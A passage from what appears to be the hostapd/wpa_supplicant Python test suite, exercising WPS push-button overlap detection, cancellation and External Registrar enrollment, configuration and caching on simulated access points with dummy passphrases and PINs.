"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "wps2", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "123456789", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd2 = hostapd.add_ap(apdev[1], params)
hapd.request("WPS_PBC")
hapd2.request("WPS_PBC")
logger.info("WPS provisioning step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected")
hapd.request("DISABLE")
hapd2.request("DISABLE")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_pbc_overlap_2sta(dev, apdev):
"""WPS PBC session overlap with two active STAs"""
ssid = "test-wps-pbc-overlap"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
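    # Two stations in active PBC mode toward the same AP constitute a session
    # overlap, reported to each station in M2D with config_error=12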
ev = dev[0].wait_event(["WPS-M2D"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected (dev0)")
if "config_error=12" not in ev:
raise Exception("PBC session overlap not correctly reported (dev0)")
dev[0].request("WPS_CANCEL")
dev[0].request("DISCONNECT")
ev = dev[1].wait_event(["WPS-M2D"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected (dev1)")
if "config_error=12" not in ev:
raise Exception("PBC session overlap not correctly reported (dev1)")
dev[1].request("WPS_CANCEL")
dev[1].request("DISCONNECT")
hapd.request("WPS_CANCEL")
ret = hapd.request("WPS_PBC")
if "FAIL" not in ret:
raise Exception("PBC mode allowed to be started while PBC overlap still active")
hapd.request("DISABLE")
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
@remote_compatible
def test_ap_wps_cancel(dev, apdev):
"""WPS AP cancelling enabled config method"""
ssid = "test-wps-ap-cancel"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
bssid = apdev[0]['bssid']
logger.info("Verify PBC enable/cancel")
hapd.request("WPS_PBC")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared")
logger.info("Verify PIN enable/cancel")
hapd.request("WPS_PIN any 12345670")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared")
def test_ap_wps_er_add_enrollee(dev, apdev):
"""WPS ER configuring AP and adding a new enrollee using PIN"""
try:
_test_ap_wps_er_add_enrollee(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
'friendly_name': "WPS AP - <>&'\" - TEST",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("WPS configuration step")
new_passphrase = "1234567890"
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin, ssid, "WPA2PSK", "CCMP",
new_passphrase)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("Start ER")
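    # The External Registrar talks UPnP over the loopback interface to match
    # the AP's upnp_iface=lo configuration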
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
    if "|WPS AP - <>&'\" - TEST|Company|" not in ev:
raise Exception("Expected friendly name not found")
logger.info("Learn AP configuration through UPnP")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
if "ssid=" + ssid not in ev:
raise Exception("Expected SSID not in settings")
if "key=" + new_passphrase not in ev:
raise Exception("Expected passphrase not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
logger.info("Add Enrollee using ER")
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
hwsim_utils.test_connectivity_sta(dev[0], dev[1])
logger.info("Add a specific Enrollee using ER")
pin = dev[2].wps_read_pin()
addr2 = dev[2].p2p_interface_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
dev[0].request("WPS_ER_PIN " + addr2 + " " + pin + " " + addr2)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
logger.info("Verify registrar selection behavior")
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].scan(freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
# It is possible for scan to miss an update especially when running
# tests under load with multiple VMs, so allow another attempt.
dev[1].scan(freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing")
logger.info("Stop ER")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"])
if ev is None:
raise Exception("WPS ER unsubscription timed out")
# It takes some time for the UPnP UNSUBSCRIBE command to go through, so wait
# a bit before verifying that the scan results have changed.
time.sleep(0.2)
for i in range(0, 10):
dev[1].request("BSS_FLUSH 0")
dev[1].scan(freq="2412", only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
if bss and 'flags' in bss and "[WPS-AUTH]" not in bss['flags']:
break
logger.debug("WPS-AUTH flag was still in place - wait a bit longer")
time.sleep(0.1)
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not removed")
def test_ap_wps_er_add_enrollee_uuid(dev, apdev):
"""WPS ER adding a new enrollee identified by UUID"""
try:
_test_ap_wps_er_add_enrollee_uuid(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee_uuid(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("WPS configuration step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
logger.info("Learn AP configuration through UPnP")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
logger.info("Add a specific Enrollee using ER (PBC/UUID)")
addr1 = dev[1].p2p_interface_addr()
dev[0].dump_monitor()
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PBC %s" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr1 not in ev:
raise Exception("Unexpected Enrollee MAC address")
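    # Event format: WPS-ER-ENROLLEE-ADD <uuid> <MAC address> ...; pick out the
    # Enrollee UUID so it can be used to authorize this specific device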
uuid = ev.split(' ')[1]
dev[0].request("WPS_ER_PBC " + uuid)
dev[1].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
logger.info("Add a specific Enrollee using ER (PIN/UUID)")
pin = dev[2].wps_read_pin()
addr2 = dev[2].p2p_interface_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
uuid = ev.split(' ')[1]
dev[0].request("WPS_ER_PIN " + uuid + " " + pin)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-REMOVE"], timeout=15)
if ev is None:
raise Exception("No Enrollee STA entry timeout seen")
logger.info("Stop ER")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_multi_add_enrollee(dev, apdev):
"""Multiple WPS ERs adding a new enrollee using PIN"""
try:
_test_ap_wps_er_multi_add_enrollee(dev, apdev)
finally:
for i in range(2):
dev[i].request("WPS_ER_STOP")
def _test_ap_wps_er_multi_add_enrollee(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
'friendly_name': "WPS AP",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
for i in range(2):
dev[i].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[i].wps_reg(apdev[0]['bssid'], ap_pin)
for i in range(2):
dev[i].request("WPS_ER_START ifname=lo")
for i in range(2):
ev = dev[i].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
dev[i].dump_monitor()
for i in range(2):
dev[i].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
for i in range(2):
ev = dev[i].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[i].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
pin = dev[2].wps_read_pin()
addr = dev[2].own_addr()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + addr)
dev[1].dump_monitor()
dev[1].request("WPS_ER_PIN any " + pin + " " + addr)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[2].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[2].wait_connected(timeout=15)
def test_ap_wps_er_add_enrollee_pbc(dev, apdev):
"""WPS ER connected to AP and adding a new enrollee using PBC"""
try:
_test_ap_wps_er_add_enrollee_pbc(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee_pbc(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Learn AP configuration")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
enrollee = dev[1].p2p_interface_addr()
if "FAIL-UNKNOWN-UUID" not in dev[0].request("WPS_ER_PBC " + enrollee):
raise Exception("Unknown UUID not reported")
logger.info("Add Enrollee using ER and PBC")
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[1].request("WPS_PBC")
for i in range(0, 2):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
if enrollee in ev:
break
if i == 1:
raise Exception("Expected Enrollee not found")
if "FAIL-NO-AP-SETTINGS" not in dev[0].request("WPS_ER_PBC " + enrollee):
        raise Exception("Missing AP settings not reported")
logger.info("Use learned network configuration on ER")
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " 0")
if "OK" not in dev[0].request("WPS_ER_PBC " + enrollee):
raise Exception("WPS_ER_PBC failed")
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
hwsim_utils.test_connectivity_sta(dev[0], dev[1])
def test_ap_wps_er_pbc_overlap(dev, apdev):
"""WPS ER connected to AP and PBC session overlap"""
try:
_test_ap_wps_er_pbc_overlap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_pbc_overlap(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[2].scan_for_bss(apdev[0]['bssid'], freq="2412")
    # Avoid leaving dev[1] or dev[2] as the sender of the last Probe Request
    # seen by the AP
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412, force_scan=True)
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
# verify BSSID selection of the AP instead of UUID
if "FAIL" in dev[0].request("WPS_ER_SET_CONFIG " + apdev[0]['bssid'] + " 0"):
raise Exception("Could not select AP based on BSSID")
dev[0].dump_monitor()
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[2].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
ev = dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
found1 = False
found2 = False
addr1 = dev[1].own_addr()
addr2 = dev[2].own_addr()
for i in range(3):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
if addr1 in ev:
found1 = True
if found2:
break
if addr2 in ev:
found2 = True
if found1:
break
if dev[0].request("WPS_ER_PBC " + ap_uuid) != "FAIL-PBC-OVERLAP\n":
raise Exception("PBC overlap not reported")
dev[1].request("WPS_CANCEL")
dev[2].request("WPS_CANCEL")
if dev[0].request("WPS_ER_PBC foo") != "FAIL\n":
raise Exception("Invalid WPS_ER_PBC accepted")
def test_ap_wps_er_v10_add_enrollee_pin(dev, apdev):
"""WPS v1.0 ER connected to AP and adding a new enrollee using PIN"""
try:
_test_ap_wps_er_v10_add_enrollee_pin(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_v10_add_enrollee_pin(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Learn AP configuration")
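    # Run the ER as a WPS 1.0 device by overriding the advertised version number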
dev[0].request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
logger.info("Use learned network configuration on ER")
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " 0")
logger.info("Add Enrollee using ER and PIN")
enrollee = dev[1].p2p_interface_addr()
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + enrollee)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
@remote_compatible
def test_ap_wps_er_config_ap(dev, apdev):
"""WPS ER configuring AP over UPnP"""
try:
_test_ap_wps_er_config_ap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_config_ap(dev, apdev):
ssid = "wps-er-ap-config"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Connect ER to the AP")
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
logger.info("WPS configuration step")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
new_passphrase = "1234567890"
dev[0].request("WPS_ER_CONFIG " + apdev[0]['bssid'] + " " + ap_pin + " " +
binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " +
binascii.hexlify(new_passphrase.encode()).decode())
ev = dev[0].wait_event(["WPS-SUCCESS"])
if ev is None:
raise Exception("WPS ER configuration operation timed out")
dev[0].wait_disconnected(timeout=10)
dev[0].connect(ssid, psk="1234567890", scan_freq="2412")
logger.info("WPS ER restart")
dev[0].request("WPS_ER_START")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out on ER restart")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found on ER restart")
if "OK" not in dev[0].request("WPS_ER_STOP"):
raise Exception("WPS_ER_STOP failed")
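    # A second WPS_ER_STOP when the ER is already stopped is also expected to
    # return OK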
if "OK" not in dev[0].request("WPS_ER_STOP"):
raise Exception("WPS_ER_STOP failed")
@remote_compatible
def test_ap_wps_er_cache_ap_settings(dev, apdev):
"""WPS ER caching AP settings"""
try:
_test_ap_wps_er_cache_ap_settings(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
time.sleep(0.2)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_cache_ap_settings_oom(dev, apdev):
"""WPS ER caching AP settings (OOM)"""
try:
_test_ap_wps_er_cache_ap_settings_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
with alloc_fail(dev[0], 1, "=wps_er_ap_use_cached_settings"):
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
